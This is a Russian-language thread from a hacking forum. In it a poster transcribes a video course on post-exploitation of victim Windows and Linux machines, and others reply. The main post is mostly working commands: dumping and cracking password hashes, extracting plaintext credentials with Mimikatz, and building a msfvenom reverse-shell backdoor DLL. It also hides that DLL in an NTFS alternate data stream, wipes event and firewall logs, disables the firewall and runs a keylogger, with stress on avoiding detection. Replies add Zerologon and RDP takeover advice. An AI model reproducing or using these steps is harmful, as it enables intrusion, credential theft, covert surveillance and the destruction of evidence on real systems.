Пароли в этом файле лежат захешированные. Когда ползователь логинется, получается хеш введёного пароля и сравнивается с хешом в Security Account Manager,
если они совпадают то система авторизирует пользователя.

Для начала нужно убедиться в том, что мы являемся системным пользователем.
getuid

Теперь запускаем команду
hashdump

Иногда бывает такое, что команда hashdump не срабатывает, тогда можно сделать так:
run post/windows/gather/hashdump

ВЗЛОМ ПАРОЛЕЙ С ПОМОЩЬЮ JOHN-THE-RIPPER:

Режимы могут использоваться в одиночку, но так же при подборе можно использовать несколько режимов взлома.

Пример:
Для взлома пароля в Linux нам понадобятся два файла
/etc/passwd и /etc/shadow

Санчала необходимо обьединить два файла:
unshadow passwd.txt shadow.txt > complete_file.txt

Теперь запустим программу
john complete_file.txt

Все результаты сохраняются в файле john.pot который лежит по адресу /root/.john/.john.pot

На самом деле нет необходимости открывать этот файл, достаточно выполнить команду:
john — show complete_file.txt

КАК ПОЛУЧИТЬ ПАРОЛЬ В ОТКРЫТОМ ВИДЕ НА WINDOWS:

КАК ПОЛУЧИТЬ ПАРОЛЬ В ОТКРЫТОМ ВИДЕ С ПОМОЩЬЮ MIMIKATZ:

Первое что нужно сделать - повысить права пользователя до максимальных.
getsystem
getuid

Теперь нужно загрузить Mimikatz
load kiwi

Чтобы посомтреть возможности Mimikatz нужно ввести команду
help

Для извлечения паролей достаточно выполнить команду
creds_all

Весь прикол mimikatz в том, что он загружается в оперативную память и не оставляет следов на жёстком диске, что снижает шансы быть обнаруженным антивирусом.

КАК СПРЯТАТЬ ФАЙЛЫ В СИСТЕМАХ WINDOWS:

Иногда бывают случаи, когда нужно использовать дополнительный софт на компьютере сервера,
но их нужно спрятать, так как если администратор заметит их, он поймёт что его система скомпрометирована.

Один из способов спрятать файлы, является возможности самой системы Windows. Дело в том, что файловая система NTFS
поддерживает так называемые альтернативные потоки данных, которые изначально использовались для совместимости
файловой системы с HFS(macintoch), однако так же могут использоваться для хранения мета-данных.

Альтенативные потоки данных скрыты от пользователей, кроме того большиство о них даже ни чего не знает.

Допустим есть два файла, exe и txt.

Для начала посмотри размер файлов

Теперь спрячем файл putty.exe в альтернативном потоке файла document.txt
type putty.exe > document.txt:test.exe
Теперь снова введём команду Dir и посмотрим на её вывод

На вид ни чего не изменилось, у файла document.txt так и осталось 67 байтов. Поэтому добавим опцию чтобы отобразить альтернативные потоки данных.
dir /r

Теперь можно удалить программу putty так как она нам более не нужна. Однако возникает вопрос - Как запустить исполняемый файл.

Способ 1
wmic process call create "c:\users\ieuser\download\document.txt:test.exe"

Ради интереса посмотрим как выглядит процесс в диспетчере задач

Данный процес сразу бросается в глаза и даже неопытный пользователь может заподозрить что-то неладное. Поэтому следует рассмотреть второй способ.

Способ 2
С помощью msfvenom мы сделаем расширение .dll
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.16 lport=5000 -f dll -o /var/www/html/backdoor.dll

Загрузив бекдор на пк жертвы, запускаем слушатель
resource /root/Desktop/Meta_scripts/listener.rc

Теперь прячем бекдор в файле document.txt
type backdoor.dll > document.txt:svchost.dll

Сам файл бекдора теперь можно удалить. Для запуска срытого бекдора мы выполняем следующую команду:
rundll32.exe "c:\users\ieuser\download\document.txt:svchost.dll", DLLMain

И нам прилетает ссесия
Теперь взгянем на процессы

В диспетчере процессов отображается легитимный процесс rundll32.exe который у неопытного пользователя не вызовет подозрений.

ЗАМЕТАНИЕ СЛЕДОВ - УДАЛЕНИЕ ЛОГОВ:

В зависисмости от настроек, система записывает события в журнал событий.
Нас больше всего интересуют логи приложений, безопасности и системы. Все эти логи можно увидеть в журнале событий.
Чтобы увидеть журнал, в меню ПУСК в поиск введите eventvwr

 

[BuyKall]

Для meterpreter есть специальный скрипт, который позволяет очистить логи. Для это сначала нужно повысить привелегии getsystem.
Затем можно использовать команду
clearev
Так же журнал событий можно очистить и без скрипта, используя команды
Для этого нужно перейти в режим shell
Теперь вводим команду
wevtutil cl Security

Теперь нужно удалить журнал событий фаервола, логи которого пишутся в обычный текстовый файл, который легко редактировать.
Для того чтобы узнать где находиться лог файл:
netsh firewall show config
Но данная команда является устаревшей и Microsoft не рекомендует использовать её, а рекомендует использовать:
netsh advfirewall show currentprofile

И в поле FileName будет путь к нему.
После чего можно перейти в эту папку используя cd
Затем выполним следующую команду:
more pfirewall.log

Чтобы удалить логи, достаточно удалить файл. А для того, чтобы его удалить - нужно выключить firewall
netsh firewall set opmode disable

Однако данная команда является устаревшей, можно пользоваться:
netsh advfirewall set currentprofile state off

Теперь можно удалить и сам файл:
del pfirewall.log

После того как мы включим firewall, данный файл будет создан

Конечно же внимательный администратор заметит что логи были удалены. Но если он их не просматривает...

УТСНОВКА ПРОГРАММЫ-ШПИОНА:

Meterpreter сожержит функцию простого кейлогера, давайте его рассмотрим:
keyscan_start
Команда запущена, теперь зайдём на компьютер жертвы и введём произвольный текст.

Теперь посмотрим как это будет выглядеть:
keyscan_dump

Для остановки программы введём:
keyscan_stop

Плюсом программы которая запускается в meterpreter в том, что она запускается в оперативной памяти и не оставляет следов на жёстком диске.
Минусом явлется то, что не способен работать в автономном режиме. Т.е. постоянно придёться держать сессию meterpreter.

На этом вроде всё. Там конечно же была ещё часть где рассматривался Armitage. Но я решил упустить этот момент, потому что он повторяет весь этот функционал,
с одним лишь отличием -> там гуяка....Молодое поколение наверное будет только рада этому, но на самом деле это лишь усложняет работу.
Так же сканирование сетки армитрагом, интегированным nmap'ом меня не порадовало....Консоль всё же ближе.

Ещё раз добавлю, что эти знания как нож, они могут быть безопасны и прокормить вас.....
Но так же этими знаниями вы можете отрезать себе руку...Каждый сам решает...Будьте добрее

Так же у меня возник вопрос, что написать? Кому принадлежит сиё творение? Дело в том, что это как бы и не мои знания, и как бы мои....
Поэтому я напишу так....

При копирование статьи, ставьте вот этот реф:
Материал был взят(вначале писал где я его увидел) и переработан BuyKall специально для xss.pro

 

[kolosok7]

На торентах же есть этот видео курс вроде как =\

 

[BuyKall]

На торентах же есть этот видео курс вроде как =\

Ну а ты начало статьи прочти
Есть на торентах, но нет у нас.....ну так себе....а вообще в интернете есть всё и давай тогда ни чего такого постить не будем на форум

 

[kolosok7]

почему нет, у тебя же просто текстовая часть этого мана...

 

[BuyKall]

почему нет, у тебя же просто текстовая часть этого мана...

Конспект

 

[n1s]

Если есть возможность может напишешь еще про внутренний пентест организаций по захвату контроллера домена поподробнее (AD) и по обходу IDS.

 

[serenity]

Не написано как получить доступ к GUI и вырубить антивирус и дефендер.
Очень хорошо написаная шпаргалка?

 

[badcapper]

На торентах же есть этот видео курс вроде как =\

дай линк

 

[BuyKall]

Если есть возможность может напишешь еще про внутренний пентест организаций по захвату контроллера домена поподробнее (AD) и по обходу IDS.

Бьёшь зерологином все такчи где есть открытый порт РДП, и смотришь где стоит AD(но бывают сети которые общодятся без АД например, так же не стоит забывать что такое ГПО)

 

[BuyKall]

Не написано как получить доступ к GUI и вырубить антивирус и дефендер.
Очень хорошо написаная шпаргалка?

Если ты смог мимиком поднять креды, то остаётся только подключиться по рдп к этому пк....даже если на нём нет рдп, его можно включить когда получен доступ к шелу или метерпретеру

 

[BuyKall]

дай линк

у меня к сожалению линка нету, на юдеми этот курс вроде есть, мб он там на английском я не знаю...
я брал линк тут https://xss.pro/threads/55331/

 

[ev4ng3liya]

почему нет, у тебя же просто текстовая часть этого мана...

А ты не думал о том, что есть те, кто не знает о существовании этого курса на торрентах ? Да и намного удобнее на форуме в одном месте всё читать, чем по торрентам бегать

 

[teatea]

Подобные мануалы нагоняют тоску:
- нет нормальной структуры;
- нет объяснению почему и как работают методы;
- почему вас не спалит антивирь, сием, ids, ngfw и прочие nta?
- на каких версиях все это взлетит?

Конечно в таком случае гайд получился бы невероятно огромным. Отсюда вытекает вывод, что гайд как таковой не нужен, а только вводит в заблжудение и навязывает чувство необоснованной уверенности.

Нужна методология хака (поиск точек входа, получение доступа, поднятие прав....) и подтсвечивание узких моментов, которые необходимо учитывать на каждом шаге: как не спалиться и как не обосратья. Правда тогда не выдйет хайпового материальчика в формате "100 шагов к успеху" или "делай это, чтобы все похакать", который так заходит школьникам.

 

[romero_4h]

Подобные мануалы нагоняют тоску:
- нет нормальной структуры;
- нет объяснению почему и как работают методы;
- почему вас не спалит антивирь, сием, ids, ngfw и прочие nta?
- на каких версиях все это взлетит?

Конечно в таком случае гайд получился бы невероятно огромным. Отсюда вытекает вывод, что гайд как таковой не нужен, а только вводит в заблжудение и навязывает чувство необоснованной уверенности.

Нужна методология хака (поиск точек входа, получение доступа, поднятие прав....) и подтсвечивание узких моментов, которые необходимо учитывать на каждом шаге: как не спалиться и как не обосратья. Правда тогда не выдйет хайпового материальчика в формате "100 шагов к успеху" или "делай это, чтобы все похакать", который так заходит школьникам.

Было бы очень классно посмотреть мануал не нагоняющий тоску
Может просто тебе не интересно. А так мануал BuyKall вышел довольно не плохим. Спасибо)
Описанные методы и техники + свой опыт + воображение + прямые руки =

"100 шагов к успеху"

 

[BuyKall]

Подобные мануалы нагоняют тоску:
- нет нормальной структуры;
- нет объяснению почему и как работают методы;
- почему вас не спалит антивирь, сием, ids, ngfw и прочие nta?
- на каких версиях все это взлетит?

Конечно в таком случае гайд получился бы невероятно огромным. Отсюда вытекает вывод, что гайд как таковой не нужен, а только вводит в заблжудение и навязывает чувство необоснованной уверенности.

Нужна методология хака (поиск точек входа, получение доступа, поднятие прав....) и подтсвечивание узких моментов, которые необходимо учитывать на каждом шаге: как не спалиться и как не обосратья. Правда тогда не выдйет хайпового материальчика в формате "100 шагов к успеху" или "делай это, чтобы все похакать", который так заходит школьникам.

А кто тебе такое будет писать ?
Вообще что за притензии ? Я просто взял видео и перевёл его в текст.....
Ищи кто этот курс продавал и пиши ему эти притензии....ведь по твоему мнениею именно он сделал такой поверхностный курс.
А для меня тут всё понятно, база дана, осталось её только расширять.
Ждёшь мануала в котором будет написано как нагибать ЛЮБУЮ сеть, то ты его не дождёшься дружище!!!

 

[BuyKall]

Подобные мануалы нагоняют тоску:
- нет нормальной структуры;
- нет объяснению почему и как работают методы;
- почему вас не спалит антивирь, сием, ids, ngfw и прочие nta?
- на каких версиях все это взлетит?

Конечно в таком случае гайд получился бы невероятно огромным. Отсюда вытекает вывод, что гайд как таковой не нужен, а только вводит в заблжудение и навязывает чувство необоснованной уверенности.

Нужна методология хака (поиск точек входа, получение доступа, поднятие прав....) и подтсвечивание узких моментов, которые необходимо учитывать на каждом шаге: как не спалиться и как не обосратья. Правда тогда не выдйет хайпового материальчика в формате "100 шагов к успеху" или "делай это, чтобы все похакать", который так заходит школьникам.

И да тут правильно сказали, пока я писал ответ тебе.....
Критекуешь ? -> Покажи как надо.
Напиши или принеси на форум такой мануал.

 

[Kelegen]

Чудесный конспект
Не слушай никого, письменно лучше запоминается )

 

[BuyKall]

Чудесный конспект
Не слушай никого, письменно лучше запоминается )

Главное не нужно отматывать видос чтобы что-то найти, а перевод там просто замечательный